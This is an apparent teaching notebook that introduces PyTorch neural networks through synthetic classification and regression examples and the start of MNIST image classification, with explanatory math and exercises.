%load_ext autoreload
%autoreload 2
%matplotlib inline
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
import copy
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
```
# Goals of this notebook
We want to introduce the basics of neural networks and deep learning. Modern deep learning is a huge field and it's impossible to cover even all the significant developments in the last 5 years here. But the basics are straightforward.
One big caveat: deep learning is a rapidly evolving field. There are new developments in neural network architectures, novel applications, better optimization techniques, theoretical results justifying why something works etc. daily. It's a great opportunity to get involved if you find research interesting and there are great online communities (pytorch, fast.ai, paperswithcode, pysyft) that you should get involved with.
**Note**: Unlike the previous notebooks, this notebook has very few questions. You should study the code, tweak the data, the parameters, and poke the models to understand what's going on.
**Notes**: You can install extensions (google for nbextensions) with Jupyter notebooks. I tend to use resuse to display memory usage in the top right corner which really helps.
To run a cell, press: "Shift + Enter"
To add a cell before your current cell, press: "Esc + a"
To add a cell after your current cell, press: "Esc + b"
To delete a cell, press: "Esc + x"
To be able to edit a cell, press: "Enter"
To see more documentation about of a function, type ?function_name
To see source code, type ??function_name
To quickly see possible arguments for a function, type "Shift + Tab" after typing the function name.
Esc and Enter take you into different modes. Press "Esc + h" to see all shortcuts.
## Synthetic/Artificial Datasets
We covered the basics of neural networks in the lecture. We also saw applications to two synthetic datasets. The goal in this section is to replicate those results and get a feel for using pytorch.
### Classification
```
def generate_binary_data(N_examples=1000, seed=None):
if seed is not None:
np.random.seed(seed)
features = []
target = []
for i in range(N_examples):
#class = 0
r = np.random.uniform()
theta = np.random.uniform(0, 2*np.pi)
features.append([r*np.cos(theta), r*np.sin(theta)])
target.append(0)
#class = 1
r = 3 + np.random.uniform()
theta = np.random.uniform(0, 2*np.pi)
features.append([r*np.cos(theta), r*np.sin(theta)])
target.append(1)
features = np.array(features)
target = np.array(target)
return features, target
features, target = generate_binary_data(seed=100)
def plot_binary_data(features, target):
plt.figure(figsize=(10,10))
plt.plot(features[target==0][:,0], features[target==0][:,1], 'p', color='r', label='0')
plt.plot(features[target==1][:,0], features[target==1][:,1], 'p', color='g', label='1')
plt.xlabel('x')
plt.ylabel('y')
plt.legend()
plot_binary_data(features, target)
```
We have two features here - x and y. There is a binary target variable that we need to predict. This is essentially the dataset from the logistic regression discussion. Logistic regression will not do well here given that the data is not linearly separable. Transforming the data so we have two features:
$$r^2 = x^2 + y^2$$
and
$$\theta = \arctan(\frac{y}{x})$$
would make it very easy to use logistic regression (or just a cut at $r = 2$) to separate the two classes but while it is easy for us to visualize the data and guess at the transformation, in high dimensions, we can't follow the same process.
Let's implement a feed-forward neural network that takes the two features as input and predicts the probabiliy of being in class 1 as output.
#### Architecture Definition
```
class ClassifierNet(nn.Module): #inherit from nn.Module to define your own architecture
def __init__(self, N_inputs, N_outputs, N_hidden_layers, N_hidden_nodes, activation, output_activation):
super(ClassifierNet, self).__init__()
self.N_inputs = N_inputs #2 in our case
self.N_outputs = N_outputs #1 in our case but can be higher for multi-class classification
self.N_hidden_layers = N_hidden_layers #we'll start by using one hidden layer
self.N_hidden_nodes = N_hidden_nodes #number of nodes in each hidden layer - can extend to passing a list
#Define layers below - pytorch has a lot of layers pre-defined
#use nn.ModuleList or nn.DictList instead of [] or {} - more explanations below
self.layer_list = nn.ModuleList([]) #use just as a python list
for n in range(N_hidden_layers):
if n==0:
self.layer_list.append(nn.Linear(N_inputs, N_hidden_nodes))
else:
self.layer_list.append(nn.Linear(N_hidden_nodes, N_hidden_nodes))
self.output_layer = nn.Linear(N_hidden_nodes, N_outputs)
self.activation = activation #activations at inner nodes
self.output_activation = output_activation #activation at last layer (depends on your problem)
def forward(self, inp):
'''
every neural net in pytorch has its own forward function
this function defines how data flows through the architecture from input to output i.e. the forward propagation part
'''
out = inp
for layer in self.layer_list:
out = layer(out) #calls forward function for each layer (already implemented for us)
out = self.activation(out) #non-linear activation
#pass activations through last/output layer
out = self.output_layer(out)
if self.output_activation is not None:
pred = self.output_activation(out)
else:
pred = out
return pred
```
There are several ways of specifying a neural net architecture in pytorch. You can work at a high level of abstraction by just listing the layers that you want to getting into the fine details by constructing your own layers (as classes) that can be used in ClassifierNet above.
How does pytorch work? When you define an architecture like the one above, pytorch constructs a graph (nodes and edges) where the nodes are operations on multi-indexed arrays (called tensors).
```
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 2
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
```
#### Training
**Loss function**
We first need to pick our loss function. Like we binary classification problems (including logistic regression), we'll use binary cross-entropy:
$$\text{Loss, } L = -\Sigma_{i=1}^{N} y_i \log(p_i) + (1-y_i) \log(1-p_i)$$
where $y_i \in {0,1}$ are the labels and $p_i \in [0,1]$ are the probability predictions.
```
#look at all available losses (you can always write your own)
#torch.nn.*Loss?
criterion = nn.BCELoss()
#get a feel for the loss function
#target = 1 (label = 1)
print(criterion(torch.tensor(1e-2), torch.tensor(1.))) #pred prob = 1e-2 -> BAD
print(criterion(torch.tensor(0.3), torch.tensor(1.))) #pred prob = 0.3 -> BAd
print(criterion(torch.tensor(0.5), torch.tensor(1.))) #pred prob = 0.5 -> Bad
print(criterion(torch.tensor(1.), torch.tensor(1.))) #pred prob = 1.0 -> GREAT!
```
**Optimizer**:
So we have the data, the neural net architecture, a loss function to measure how well the model does on our task. We also need a way to do gradient descent.
Recall, we use gradient descent to minimize the loss by computing the first derivative (gradients) and taking a step in the direction opposite (since we are minimizing) to the gradient:
$$w_{t} \rightarrow w_{t} - \eta \frac{\partial L}{\partial w_{t-1}}$$
where $w_t$ = weight at time-step t, $L$ = loss, $\eta$ = learning rate.
For our neural network, we first need to calculate the gradients. Thankfully, this is done automatically by pytorch using a procedure called **backpropagation**. If you are interested in more calculations details, please check "automatic differentiation" and an analytical calculation for a feed-forward network (https://treeinrandomforest.github.io/deep-learning/2018/10/30/backpropagation.html).
The gradients are calculated by calling a function **backward** on the network, as we'll see below.
Once the gradients are calculated, we need to update the weights. In practice, there are many heuristics/variants of the update step above that lead to better optimization behavior. A great resource to dive into details is https://ruder.io/optimizing-gradient-descent/. We won't get into the details here.
We'll choose what's called the **Adam** optimizer.
```
#optim.*?
optimizer = optim.Adam(net.parameters(), lr=1e-2)
```
We picked a constant learning rate here (which is adjusted internally by Adam) and also passed all the tunable weights in the network by using: net.parameters()
```
list(net.parameters())
```
There are 9 free parameters:
* A 2x2 matrix (4 parameters) mapping the input layer to the 1 hidden layer.
* A 2x1 matrix (2 parameters) mapping the hidden layer to the output layer with one node.
* 2 biases for the 2 nodes in the hidden layer.
* 1 bias for the output node in the output layer.
This is a good place to explain why we need to use nn.ModuleList. If we had just used a vanilla python list, net.parameters() would only show weights that are explicitly defined in our net architecture. The weights and biases associated with the layers would NOT show up in net.parameters(). This process of a module higher up in the hierarchy (ClassifierNet) subsuming the weights and biases of modules lower in the hierarchy (layers) is called **registering**. ModuleList ensures that all the weights/biases are registered as weights and biases of ClassifierNet.
Let's combine all these elements and train our first neural net.
```
#convert features and target to torch tensors
features = torch.from_numpy(features)
target = torch.from_numpy(target)
#if have gpu, throw the model, features and labels on it
net = net.to(device)
features = features.to(device).float()
target = target.to(device).float()
```
We need to do the following steps now:
* Compute the gradients for our dataset.
* Do gradient descent and update the weights.
* Repeat till ??
The problem is there's no way of knowing when we have converged or are close to the minimum of the loss function. In practice, this means we keep repeating the process above and monitor the loss as well as performance on a hold-out set. When we start over-fitting on the training set, we stop. There are various modifications to this procedure but this is the essence of what we are doing.
Each pass through the whole dataset is called an **epoch**.
```
N_epochs = 100
for epoch in range(N_epochs):
out = net(features) #make predictions on the inputs
loss = criterion(out, target) #compute loss on our predictions
optimizer.zero_grad() #set all gradients to 0
loss.backward() #backprop to compute gradients
optimizer.step() #update the weights
if epoch % 10 == 0:
print(f'Loss = {loss:.4f}')
```
Let's combined all these elements into a function
```
def train_model(features, target, model, lr, N_epochs, criterion=nn.BCELoss(), shuffle=False):
#criterion = nn.BCELoss() #binary cross-entropy loss as before
optimizer = torch.optim.Adam(model.parameters(), lr=lr) #Adam optimizer
#if have gpu, throw the model, features and labels on it
model = model.to(device)
features = features.to(device)
target = target.to(device)
for epoch in range(N_epochs):
if shuffle: #should have no effect on gradients in this case
indices = torch.randperm(len(features))
features_shuffled = features[indices]
target_shuffled = target[indices]
else:
features_shuffled = features
target_shuffled = target
out = model(features_shuffled)
#out = out.reshape(out.size(0))
loss = criterion(out, target_shuffled)
if epoch % 1000 == 0:
print(f'epoch = {epoch} loss = {loss}')
optimizer.zero_grad()
loss.backward()
optimizer.step()
pred = model(features_shuffled).reshape(len(target))
pred[pred>0.5] = 1
pred[pred<=0.5] = 0
#print(f'Accuracy = {accuracy}')
model = model.to('cpu')
features = features.to('cpu')
target = target.to('cpu')
return model
```
**Exercise**: Train the model and vary the number of hidden nodes and see what happens to the loss. Can you explain this behavior?
```
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 1 #<--- play with this
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
net = train_model(features, target, net, 1e-3, 2)
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 2 #<--- play with this
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
net = train_model(features, target, net, 1e-3, 2)
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 3 #<--- play with this
activation = nn.Sigmoid()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
net = train_model(features, target, net, 1e-3, 2)
```
There seems to be some "magic" behavior when we increase the number of nodes in the first (and only) hidden layer from 2 to 3. Loss suddenly goes down dramatically. At this stage, we should explore why that's happening.
For every node in the hidden layer, we have a mapping from the input to that node:
$$\sigma(w_1 x + w_2 y + b)$$
where $w_1, w_2, b$ are specific to that hidden node. We can plot the decision line in this case:
$$w_1 x + w_2 y + b = 0$$
Unlike logistic regression, this is not actually a decision line. Points on one side are not classified as 0 and points on the other side as 1 (if the threshold = 0.5). Instead this line should be thought of as one defining a new coordinate-system. Instead of x and y coordinates, every hidden node induces a straight line and a new coordinate, say $\alpha_i$. So if we have 3 hidden nodes, we are mapping the 2-dimensional input space into a 3-dimensional space where the coordinates $\alpha_1, \alpha_2, \alpha_3$ for each point depend on which side of the 3 lines induced as mentioned above, it lies.
```
params = list(net.parameters())
print(params[0]) #3x2 matrix
print(params[1]) #3 biases
features = features.detach().cpu().numpy() #detach from pytorch computational graph, bring back to cpu, convert to numpy
target = target.detach().cpu().numpy()
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot()
#plot raw data
ax.plot(features[target==0][:,0], features[target==0][:,1], 'p', color='r', label='0')
ax.plot(features[target==1][:,0], features[target==1][:,1], 'p', color='g', label='1')
plt.xlabel('x')
plt.ylabel('y')
#get weights and biases
weights = params[0].detach().numpy()
biases = params[1].detach().numpy()
#plot straight lines
x_min, x_max = features[:,0].min(), features[:,0].max()
y_lim_min, y_lim_max = features[:,1].min(), features[:,1].max()
for i in range(weights.shape[0]): #loop over each hidden node in the one hidden layer
coef = weights[i]
intercept = biases[i]
y_min = (-intercept - coef[0]*x_min)/coef[1]
y_max = (-intercept - coef[0]*x_max)/coef[1]
ax.plot([x_min, x_max], [y_min, y_max])
ax.set_xlim(x_min, x_max)
ax.set_ylim(y_lim_min, y_lim_max)
ax.legend(framealpha=0)
```
This is the plot we showed in the lecture. For every hidden node in the hidden layer, we have a straight line. The colors of the three lines above are orange, green and blue and that's what we'll call our new coordinates.
Suppose you pick a point in the red region:
* It lies to the *right* of the orange line
* It lies to the *bottom* of the green line
* It lies to the *top* of the blue line.
(These directions might change because of inherent randomness during training - weight initializations here).
On the other hand, we have **6** green regions. If you start walking clockwise from the top green section, every time you cross a straight line, you walk into a new region. Each time you walk into a new region, you flip the coordinate of one of the 3 lines. Either you go from *right* to *left* of the orange line, *bottom* to *top* of the green line or *top* to *bottom* of the blue line.
So instead of describing each point by two coordinates (x, y), we can describe it by (orange status, green status, blue status). We happen to have 7 such regions here - with 1 being purely occupied by the red points and the other 7 by green points.
This might be become cleared from a 3-dimensional plot.
```
from mpl_toolkits.mplot3d import Axes3D
#get hidden layer activations for all inputs
features_layer1_3d = net.activation(net.layer_list[0](torch.tensor(features))).detach().numpy()
print(features_layer1_3d[0:10])
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
ax.plot(features_layer1_3d[target==0][:,0], features_layer1_3d[target==0][:,1], features_layer1_3d[target==0][:,2], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,0], features_layer1_3d[target==1][:,1], features_layer1_3d[target==1][:,2], 'p', color ='g', label='1')
ax.legend(framealpha=0)
```
At this stage, a simple linear classifier can draw a linear decision boundary (a plane) to separate the red points from the green points. Also, these points lie in the unit cube (cube with sides of length=1) since we are using sigmoid activations. Whenever the activations get saturated (close to 0 or 1), then we see points on the edges and corners of the cube.
**Question**: Switch the activation from sigmoid to relu (nn.ReLU()). Does the loss still essentially become zero on the train set? If not, try increasing N_hidden_nodes. At what point does the loss actually become close to 0?
```
N_inputs = 2
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 5 #<---- play with this
activation = nn.ReLU()
output_activation = nn.Sigmoid() #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
features = torch.tensor(features)
target = torch.tensor(target)
net = train_model(features, target, net, 1e-3, 2)
```
**Question**: Remake the 3d plot but by trying 3 coordinates out of the N_hidden_nodes coordinates you found above?
```
features = features.detach().cpu().numpy() #detach from pytorch computational graph, bring back to cpu, convert to numpy
target = target.detach().cpu().numpy()
#get hidden layer activations for all inputs
features_layer1_3d = net.activation(net.layer_list[0](torch.tensor(features))).detach().numpy()
print(features_layer1_3d[0:10])
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 0
COORD2 = 1
COORD3 = 2
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 0
COORD2 = 1
COORD3 = 3
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 0
COORD2 = 2
COORD3 = 3
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = 1
COORD2 = 2
COORD3 = 3
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
```
Draw all the plots
```
import itertools
for comb in itertools.combinations(np.arange(N_hidden_nodes), 3):
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(projection='3d')
COORD1 = comb[0]
COORD2 = comb[1]
COORD3 = comb[2]
ax.plot(features_layer1_3d[target==0][:,COORD1], features_layer1_3d[target==0][:,COORD2], features_layer1_3d[target==0][:,COORD3], 'p', color ='r', label='0')
ax.plot(features_layer1_3d[target==1][:,COORD1], features_layer1_3d[target==1][:,COORD2], features_layer1_3d[target==1][:,COORD3], 'p', color ='g', label='1')
ax.legend(framealpha=0)
plt.title(f'COORDINATES = {comb}')
```
**Note**: Generally it is a good idea to use a linear layer for the output layer and use BCEWithLogitsLoss to avoid numerical instabilities. We will do this later for multi-class classification.
Clear variables
```
features = None
features_layer1_3d = None
target = None
net = None
```
### Regression
```
def generate_regression_data(L=10, stepsize=0.1):
x = np.arange(-L, L, stepsize)
y = np.sin(3*x) * np.exp(-x / 8.)
return x, y
def plot_regression_data(x, y):
plt.figure(figsize=(10,10))
plt.plot(x, y)
plt.xlabel('x')
plt.ylabel('y')
x, y = generate_regression_data()
plot_regression_data(x, y)
```
This is a pretty different problem in some ways. We now have one input - x and one output - y. But looked at another way, we simply change the number of inputs in our neural network to 1 and we change the output activation to be a linear function. Why linear? Because in principle, the output (y) can be unbounded i.e. any real value.
We also need to change the loss function. While binary cross-entropy is appropriate for a classification problem, we need something else for a regression problem. We'll use mean-squared error:
$$\frac{1}{2}(y_{\text{target}} - y_{\text{pred}})^2$$
Try modifying N_hidden_nodes from 1 through 10 and see what happens to the loss
```
N_inputs = 1
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 10 #<--- play with this
activation = nn.Sigmoid()
output_activation = None #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
features = torch.tensor(x).float().reshape(len(x), 1)
target = torch.tensor(y).float().reshape(len(y), 1)
net = train_model(features, target, net, 1e-2, 2, criterion=nn.MSELoss())
pred = net(features).cpu().detach().numpy().reshape(len(features))
plt.plot(x, y)
plt.plot(x, pred)
```
As before, we need to understand what the model is doing. As before, let's consider the mapping from the input node to one node of the hidden layer. In this case, we have the mapping:
$$\sigma(w_i x + b_i)$$
where $w_i, b_i$ are the weight and bias associated with each node of the hidden layer. This defines a "decision" boundary where:
$$w_i x + b_i = 0$$
This is just a value $\delta_{i} \equiv -\frac{b_i}{w_i}$.
For each hidden node $i$, we can calculate one such threshold, $\delta_i$.
As we walk along the x-axis from the left to right, we will cross each threshold one by one. On crossing each threshold, one hidden node switches i.e. goes from $0 \rightarrow 1$ or $1 \rightarrow 0$. What effect does this have on the output or prediction?
Since the last layer is linear, its output is:
$y = v_1 h_1 + v_2 h_2 + \ldots + v_n h_n + c$
where $v_i$ are the weights from the hidden layer to the output node, $c$ is the bias on the output node, and $h_i$ are the activations on the hidden nodes. These activations can smoothly vary between 0 and 1 according to the sigmoid function.
So, when we cross a threshold, one of the $h_j$ values eithers turns off or turns on. This has the effect of adding or subtracting constant $v_k$ values from the output if the kth hidden node, $h_k$ is switching on/off.
This means that as we add more hidden nodes, we can divide the domain (the x values) into more fine-grained intervals that can be assigned a single value by the neural network. In practice, there is a smooth interpolation.
**Question**: Suppose instead of the sigmoid activations, we used a binary threshold:
$$\sigma(x) = \begin{cases}
1 & x > 0 \\
0 & x \leq 0
\end{cases}$$
then we would get a piece-wise constant prediction from our trained network. Plot that piecewise function as a function of $x$.
```
activations = net.activation(net.layer_list[0](features))
print(activations[0:10])
binary_activations = nn.Threshold(0.5, 0)(activations)/activations
print(binary_activations[0:10])
binary_pred = net.output_layer(binary_activations)
plt.figure(figsize=(10,10))
plt.plot(x,y, label='data')
plt.plot(x, binary_pred.cpu().detach().numpy(), label='binary')
plt.plot(x, pred, color='r', label='pred')
plt.legend()
```
**Question**: Why does the left part of the function fit so well but the right side is always compromised? Hint: think of the loss function.
The most likely reason is that the loss function is sensitive to the scale of the $y$ values. A 10% deviation between the y-value and the prediction near x = -10 has a larger absolute value than a 10% deviation near say, x = 5.
**Question**: Can you think of ways to test this hypothesis?
There are a couple of things you could do. One is to flip the function from left to right and re-train the model. In this case, the right side should start fitting better.
Another option is to change the loss function to percentage error i.e.:
$$\frac{1}{2} \big(\frac{y_{\text{target}} - y_{\text{pred}}}{y_{\text{target}}}\big)^2$$
but this is probably much harder to optimize.
```
y = copy.copy(y[::-1])
plt.plot(x, y)
N_inputs = 1
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 10
activation = nn.Sigmoid()
output_activation = None #we want one probability between 0-1
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
features = torch.tensor(x).float().reshape(len(x), 1)
target = torch.tensor(y).float().reshape(len(y), 1)
net = train_model(features, target, net, 1e-2, 2, criterion=nn.MSELoss())
pred = net(features).cpu().detach().numpy().reshape(len(features))
plt.figure(figsize=(10,10))
plt.plot(x, y)
plt.plot(x, pred)
```
As expected, now the right side of the function fits well.
```
activations = net.activation(net.layer_list[0](features))
binary_activations = nn.Threshold(0.5, 0)(activations)/activations
binary_pred = net.output_layer(binary_activations)
plt.figure(figsize=(10,10))
plt.plot(x,y, label='data')
plt.plot(x, binary_pred.cpu().detach().numpy(), label='binary')
plt.plot(x, pred, color='r', label='pred')
plt.legend()
```
### Clear Memory
At this stage, you should restart the kernel and clear the output since we don't need anything from before.
### Image Classification
One of the most successful applications of deep learning has been to computer vision. A central task of computer vision is **image classification**. This is the task of assigning exactly one of multiple labels to an image.
pytorch provides a package called **torchvision** which includes datasets, some modern neural network architectures as well as helper functions for images.
```
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
import copy
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
from torchvision.datasets import MNIST
from torchvision import transforms
DOWNLOAD_PATH = "../data/MNIST"
mnist_train = MNIST(DOWNLOAD_PATH,
train=True,
download=True,
transform = transforms.Compose([transforms.ToTensor()]))
mnist_test = MNIST(DOWNLOAD_PATH,
train=False,
download=True,
transform = transforms.Compose([transforms.ToTensor()]))
```
You will most likely run into memory issues between the data and the weights/biases of your neural network. Let's instead sample 1/10th the dataset.
```
print(mnist_train.data.shape)
print(mnist_train.targets.shape)
N_choose = 30
chosen_ids = np.random.choice(np.arange(mnist_train.data.shape[0]), N_choose)
print(chosen_ids[0:10])
print(mnist_train.data[chosen_ids, :, :].shape)
print(mnist_train.targets[chosen_ids].shape)
mnist_train.data = mnist_train.data[chosen_ids, :, :]
mnist_train.targets = mnist_train.targets[chosen_ids]
print(mnist_test.data.shape)
print(mnist_test.targets.shape)
N_choose = 30
chosen_ids = np.random.choice(np.arange(mnist_test.data.shape[0]), N_choose)
print(chosen_ids[0:10])
print(mnist_test.data[chosen_ids, :, :].shape)
print(mnist_test.targets[chosen_ids].shape)
mnist_test.data = mnist_test.data[chosen_ids, :, :]
mnist_test.targets = mnist_test.targets[chosen_ids]
```
MNIST is one of the classic image datasets and consists of 28 x 28 pixel images of handwritten digits. We downloaded both the train and test sets. Transforms defined under target_transform will be applied to each example. In this example, we want tensors and not images which is what the transforms do.
The train set consists of 60000 images.
```
mnist_train.data.shape
mnist_train.data[0]
plt.imshow(mnist_train.data[0])
```
There are 10 unique labels - 0 through 9
```
mnist_train.targets[0:10]
```
The labels are roughly equally/uniformly distributed
```
np.unique(mnist_train.targets, return_counts=True)
```
The test set consists of 10000 images.
```
mnist_test.data.shape
plt.imshow(mnist_test.data[10])
```
Same labels
```
mnist_test.targets[0:10]
```
Pretty equally distributed.
```
np.unique(mnist_test.targets, return_counts=True)
```
**Image Classifier**:
We first have to pick an architecture. The first one we'll pick is a feed-forward neural network like the one we used in the exercises above. This time I am going to use a higher abstraction to define the network.
```
#convert 28x28 image -> 784-dimensional flattened vector
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, inp):
return inp.flatten(start_dim=1, end_dim=2)
Flatten()(mnist_train.data[0:10]).shape
```
Architecture definition using nn.Sequential. You can just list the layers in a sequence. We carry out the following steps:
* Flatten each image into a 784 dimensional vector
* Map the image to a 100-dimensional vector using a linear layer
* Apply a relu non-linearity
* Map the 100-dimensional vector into a 10-dimensional output layer since we have 10 possible targets.
* Apply a softmax activation to convert the 10 numbers into a probability distribution that assigns the probability the image belonging to each class (0 through 9)
A softmax activation takes N numbers $a_1, \ldots, a_{10}$ and converts them to a probability distribution. The first step is to ensure the numbers are positive (since probabilities cannot be negative). This is done by exponentiation.
$$a_i \rightarrow e^{a_i}$$
The next step is to normalize the numbers i.e. ensure they add up to 1. This is very straightforward. We just divide each score by the sum of scores:
$$p_i = \frac{e^{a_i}}{e^{a_1} + e^{a_2} + \ldots + e^{a_N}}$$
This is the softmax function. If you have done statistical physics (physics of systems with very large number of interacting constituents), you probably have seen the Boltzmann distribution:
$$p_i = \frac{e^{-\beta E_i}}{e^{-\beta E_1} + e^{-\beta E_2} + \ldots + e^{-\beta E_N}}$$
which gives the probability that a system with N energy levels is in the state with energy $i$ when it is in equilibrium with a thermal bath at temperature $T = \frac{1}{k_B\beta}$. This is the only probability distribution that is invariant to constant shifts in energy: $E_i \rightarrow E_i + \Delta$.
Network definition
```
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
nn.Softmax(dim=1) #convert 10-dim activation to probability distribution
)
```
Let's ensure the data flows through our neural network and check the dimensions. As before, the neural net object is a python callable.
```
image_ff_net(mnist_train.data[0:12].float()).shape
```
We get a 10-dimensional output as expected.
**Question**: Check that the outputs for each image are actually a probability distribution (the numbers add up to 1).
```
image_ff_net(mnist_train.data[0:10].float()).sum(dim=1)
```
**Question**: We have an architecture for our neural network but we now need to decide what loss to pick. Unlike the classification problem earlier which had two classes, we have 10 classes here. Take a look at the pytorch documentation - what loss do you think we should pick to model this problem?
We used cross-entropy loss on days 2 and 3. We need the same loss here. Pytorch provides NLLLoss (negative log likelihood) as well as CrossEntropyLoss.
**Question**: Look at the documentation for both of these loss functions. Which one should we pick? Do we need to make any modifications to our architecture?
We will use the Cross-entropy Loss which can work with the raw scores (without a softmax layer).
```
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
)
```
Now we'll get raw unnormalized scores that were used to compute the probabilities. We should use nn.CrossEntropyLoss in this case.
```
image_ff_net(mnist_train.data[0:12].float())
loss = nn.CrossEntropyLoss()
```
**Training**: We have an architecture, the data, an appropriate loss. Now we need to loop over the images, use the loss to compare the predictions to the targets, compute the gradients and update the weights.
In our previous examples, we had N_epoch passes over our dataset and each time, we computed predictions for the full dataset. This is impractical as datasets gets larger. Instead, we need to split the data into **batches** of a fixed size, compute the loss, the gradients and update the weights for each batch.
pytorch provides a DataLoader class that makes it easy to generate batches from your dataset.
**Optional**:
Let's analyze how using batches can be different from using the full dataset. Suppose our data has 10,000 rows but we use batches of size 100 (usually we pick powers of 2 for the GPU but this is just an example). Statistically, our goal is always to compute the gradient:
$$\frac{\partial L}{\partial w_i}$$
for all the weights $w_i$. By weights here, I mean both the weights and biases and any other free or tunable parameters in our model.
In practice, the loss is a sum over all the examples in our dataset:
$$L = \frac{1}{N}\Sigma_{i}^N l(p_i, t_i)$$
where $p_i$ = prediction for ith example, $t_i$ = target/label for ith example. So the derivative is:
$$\frac{\partial L}{\partial w_i} = \frac{1}{N}\Sigma_i^N \frac{\partial l(p_i, t_i)}{\partial w_i} $$
In other words, our goal is to calculate this quantity but $N$ is too large. So we pick a randomly chosen subset of size 100 and only average the gradients over those examples. As an analogy, if our task was to measure the average height of all the people in the world which is impractical, we would pick randomly chosen subsets, say of 10,000 people and measure their average heights.
Of course, as we make the subset smaller, the estimate we get will be noisier i.e. it has a greater chance of higher deviation from the actual value (height or gradient). Is this good or bad? It depends. In our case, we are optimizing a function (the loss) that has multiple local minima and saddle points. It is easy to get stuck in regions of the loss space/surface. Having noisy gradients can help with escaping those local minima just because we'll not always be moving in the direction of the true gradient but a noisy estimate.
Some commonly used terminology in case you read papers/articles:
* (Full) Gradient Descent - compute the gradients over the full dataset. Memory-intensive for larger datasets. This is what we did with our toy examples above.
* Mini-batch Gradient Descent - use randomly chosen samples of fixed size as your data. Noisier gradients, more frequent updates to your model, memory efficient.
* Stochastic Gradient Descent - Mini-batch gradient descent with batch size = 1. Very noisy estimate, "online" updates to your model, can be hard to converge.
There are some fascinating papers on more theoretical investigations into the loss surface and the behavior of gradient descent. Here are some examples:
* https://papers.nips.cc/paper/7875-visualizing-the-loss-landscape-of-neural-nets.pdf
* https://arxiv.org/abs/1811.03804
* https://arxiv.org/pdf/1904.06963.pdf
**End of optional section**
```
BATCH_SIZE = 16 #number of examples to compute gradients over (a batch)
#python convenience classes to sample and create batches
train_dataloader = torch.utils.data.DataLoader(mnist_train,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
test_dataloader = torch.utils.data.DataLoader(mnist_test,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
idx, (data_example, target_example) = next(enumerate(train_dataloader))
print(idx)
print(data_example.shape)
print(target_example.shape)
```
